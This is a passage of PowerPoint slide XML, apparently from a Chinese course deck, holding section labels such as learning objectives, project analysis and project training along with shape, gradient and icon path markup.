              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" dirty="0"/>
                  <a:t>学习目标</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="67" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3020" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目分析</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="70" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5759" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>相关知识</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="73" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8551" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目实例</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="76" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="11344" y="6929"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目实施</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="84" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId5"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13895" y="6880"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目训练</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="86" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="16233" y="2830"/>
              <a:ext cx="2054" cy="3672"/>
              <a:chOff x="5960997" y="2484779"/>
              <a:chExt cx="1304471" cy="2341845"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="87" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="88" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="89" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId6"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="90" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId7"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="91" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr>
                  <p:custDataLst>
                    <p:tags r:id="rId8"/>
                  </p:custDataLst>
                </p:nvPr>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6312532" y="4240732"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="92" name="AutoShape 112"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId9"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6453017" y="4367800"/>
                <a:ext cx="328308" cy="328869"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T1" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T3" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T4" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T6" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T7" fmla="*/ 10800 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21020" h="21600">
                    <a:moveTo>
                      <a:pt x="18846" y="7946"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17740" y="9091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17740" y="8939"/>
                      <a:pt x="17758" y="8792"/>
                      <a:pt x="17744" y="8636"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17629" y="7331"/>
                      <a:pt x="17036" y="6068"/>
                      <a:pt x="16074" y="5080"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15004" y="3980"/>
                      <a:pt x="13585" y="3348"/>
                      <a:pt x="12180" y="3345"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13268" y="2218"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="13812" y="1659"/>
                      <a:pt x="14572" y="1350"/>
                      <a:pt x="15403" y="1350"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16460" y="1350"/>
                      <a:pt x="17546" y="1840"/>
                      <a:pt x="18381" y="2696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19165" y="3500"/>
                      <a:pt x="19631" y="4499"/>
                      <a:pt x="19698" y="5510"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19760" y="6453"/>
                      <a:pt x="19457" y="7317"/>
                      <a:pt x="18846" y="7946"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="5828" y="19329"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5813" y="18424"/>
                      <a:pt x="5454" y="17481"/>
                      <a:pt x="4730" y="16739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4046" y="16034"/>
                      <a:pt x="3150" y="15628"/>
                      <a:pt x="2257" y="15592"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2911" y="13157"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2959" y="12995"/>
                      <a:pt x="3052" y="12835"/>
                      <a:pt x="3168" y="12695"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4485" y="11726"/>
                      <a:pt x="6512" y="12012"/>
                      <a:pt x="7920" y="13460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9409" y="14990"/>
                      <a:pt x="9639" y="17230"/>
                      <a:pt x="8492" y="18568"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8416" y="18609"/>
                      <a:pt x="8339" y="18648"/>
                      <a:pt x="8256" y="18675"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8256" y="18675"/>
                      <a:pt x="5828" y="19329"/>
                      <a:pt x="5828" y="19329"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2737" y="20164"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2665" y="20181"/>
                      <a:pt x="2443" y="20239"/>
                      <a:pt x="2291" y="20249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1751" y="20244"/>
                      <a:pt x="1313" y="19792"/>
                      <a:pt x="1313" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1321" y="19124"/>
                      <a:pt x="1365" y="18929"/>
                      <a:pt x="1380" y="18857"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2071" y="16283"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2822" y="16261"/>
                      <a:pt x="3630" y="16562"/>
                      <a:pt x="4265" y="17215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4911" y="17878"/>
                      <a:pt x="5214" y="18725"/>
                      <a:pt x="5181" y="19504"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5181" y="19504"/>
                      <a:pt x="2737" y="20164"/>
                      <a:pt x="2737" y="20164"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6888" y="11179"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6280" y="10927"/>
                      <a:pt x="5642" y="10783"/>
                      <a:pt x="5004" y="10774"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="10063" y="5536"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10838" y="4759"/>
                      <a:pt x="11966" y="4536"/>
                      <a:pt x="13077" y="4819"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13077" y="4819"/>
                      <a:pt x="6888" y="11179"/>
                      <a:pt x="6888" y="11179"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9717" y="13672"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9473" y="13258"/>
                      <a:pt x="9194" y="12859"/>
                      <a:pt x="8848" y="12505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8447" y="12093"/>
                      <a:pt x="7986" y="11770"/>
                      <a:pt x="7507" y="11498"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13767" y="5064"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="14259" y="5288"/>
                      <a:pt x="14729" y="5607"/>
                      <a:pt x="15145" y="6035"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15500" y="6398"/>
                      <a:pt x="15775" y="6806"/>
                      <a:pt x="15987" y="7229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15987" y="7229"/>
                      <a:pt x="9717" y="13672"/>
                      <a:pt x="9717" y="13672"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10519" y="16061"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10465" y="15452"/>
                      <a:pt x="10298" y="14854"/>
                      <a:pt x="10047" y="14288"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16257" y="7906"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16637" y="9140"/>
                      <a:pt x="16442" y="10429"/>
                      <a:pt x="15610" y="11284"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15604" y="11290"/>
                      <a:pt x="15598" y="11293"/>
                      <a:pt x="15593" y="11298"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15602" y="11306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10525" y="16565"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10527" y="16397"/>
                      <a:pt x="10534" y="16232"/>
                      <a:pt x="10519" y="16061"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="19308" y="1741"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18228" y="632"/>
                      <a:pt x="16805" y="0"/>
                      <a:pt x="15403" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14220" y="0"/>
                      <a:pt x="13131" y="450"/>
                      <a:pt x="12335" y="1266"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9138" y="4577"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9129" y="4585"/>
                      <a:pt x="9118" y="4592"/>
                      <a:pt x="9108" y="4602"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9103" y="4608"/>
                      <a:pt x="9100" y="4614"/>
                      <a:pt x="9095" y="4620"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9096" y="4621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2310" y="11647"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1998" y="11966"/>
                      <a:pt x="1771" y="12364"/>
                      <a:pt x="1645" y="12797"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102" y="18541"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="18557"/>
                      <a:pt x="0" y="19008"/>
                      <a:pt x="0" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="20541"/>
                      <a:pt x="1030" y="21599"/>
                      <a:pt x="2302" y="21599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2554" y="21599"/>
                      <a:pt x="3044" y="21475"/>
                      <a:pt x="3062" y="21473"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8630" y="19969"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9054" y="19839"/>
                      <a:pt x="9439" y="19604"/>
                      <a:pt x="9750" y="19283"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19776" y="8899"/>
                    </a:lnTo>
